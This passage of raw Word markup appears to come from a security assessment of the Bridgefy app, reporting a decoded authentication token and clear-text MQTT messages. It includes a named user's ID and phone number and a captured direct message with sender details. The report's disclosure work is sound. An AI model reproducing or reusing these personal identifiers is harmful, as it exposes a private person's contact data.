        </w:rPr>
        <w:t>PII:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Base64-decoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>token:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Oscar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"iss"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"https://securetoken.google.com/bridgefy-app-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>staging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"aud"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"brid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>gefy-app-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>staging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"auth_time"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1672419169,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>user_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"U309RRQIulX95ChRjWv16PqwFlp1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"sub"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"U309RRQIulX95ChRjWv16PqwFlp1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"iat"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1672419171,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"exp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1672422771,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"+12064512559</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@bridgefy.app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"email_verified"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>phone_number"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"+12064512559</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"firebase"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"identit ies"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"phone"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"+12064512559"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:b/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>"+12064512559@bridgefy.app"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"sign_in_provider "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fX0[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>between</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Similarly, user messages are also sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>clear-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was captured during this assignment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>message:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4ÍLbf/e965dd5f-8df8-4478-b51c-f3ac82fac134/e16ee31e-9aea-44c2-abdb-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>57d1f3473b01{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>de3aade-a1c3-423c-bd99-849efa6e780d"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"{\"uuid\":\"1de3aade-a1c3-423c-bd99-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>849</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5467350" cy="595630"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="19" name="Textbox 19"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="19" name="Textbox 19"/>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5467350" cy="595630"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p>
                            <w:pPr>
                              <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
                              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>efa6e780d\",\"payload\":{\"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>senderId</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>\":\"e965dd5f-8df8-4478-b51c-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>f3ac82fac134\",\"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>sender Name\":\"Oscar\",\"senderNickname\":\"oscarm\",\"senderAvatar\":7</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>,\"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
